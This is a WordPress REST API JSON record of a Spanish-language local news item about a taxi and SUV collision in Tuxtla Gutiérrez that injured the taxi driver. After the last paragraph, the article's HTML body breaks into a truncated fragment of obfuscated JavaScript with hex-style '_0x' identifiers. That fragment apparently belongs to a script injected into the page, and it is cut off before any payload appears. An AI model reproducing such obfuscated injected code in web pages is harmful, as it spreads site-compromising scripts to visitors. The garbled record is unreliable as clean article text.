{"id":20453,"date":"2025-02-19T04:06:36","date_gmt":"2025-02-19T04:06:36","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=20453"},"modified":"2025-02-19T04:06:36","modified_gmt":"2025-02-19T04:06:36","slug":"choque-entre-taxi-y-particular-deja-un-herido","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=20453","title":{"rendered":"Choque entre taxi y particular deja un herido"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250218-WA0017-1024x768.jpg\" alt=\"\" class=\"wp-image-20454\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250218-WA0017-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250218-WA0017-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250218-WA0017-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250218-WA0017-1536x1152.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250218-WA0017.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudano, 18 de febrero del 2025. Tuxtla Guti\u00e9rrez. &#8211; Un herido y da\u00f1os materiales dej\u00f3 un choque entre un taxi Nissan Tsuru con n\u00famero econ\u00f3mico 1060 y una camioneta Nissan Xtrail de color blanco ocurrido este martes sobre la Avenida Central y 15 Oriente del Barrio Hidalgo de Tuxtla.<\/p>\n\n\n\n<p>Los reportes de tr\u00e1nsito informaron que, este siniestro ocurri\u00f3 cuando la camioneta circulaba de Oriente a Poniente y de manera repentina gir\u00f3 a la izquierda e hizo corte de circulaci\u00f3n al taxi.<\/p>\n\n\n\n<p>Por el impacto el conductor del taxi result\u00f3 herido y fue atendido por param\u00e9dicos de la Cruz Roja Mexicana pero no amerit\u00f3 ser trasladado.<\/p>\n\n\n\n<p>El responsable del accidente se hizo cargo del accidente y los gastos.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudano, 18 de febrero del 2025. Tuxtla Guti\u00e9rrez. &#8211; Un herido y da\u00f1os materiales dej\u00f3 un choque entre un taxi Nissan Tsuru con n\u00famero econ\u00f3mico 1060 y una camioneta Nissan Xtrail de color blanco ocurrido este martes sobre la Avenida Central y 15 Oriente del Barrio Hidalgo de Tuxtla. Los reportes de &hellip;<\/p>\n","protected":false},"author":2,"featured_media":20454,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-20453","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20453","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=20453"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20453\/revisions"}],"predecessor-version":[{"id":20455,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20453\/revisions\/20455"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/20454"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=20453"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=20453"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=20453"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}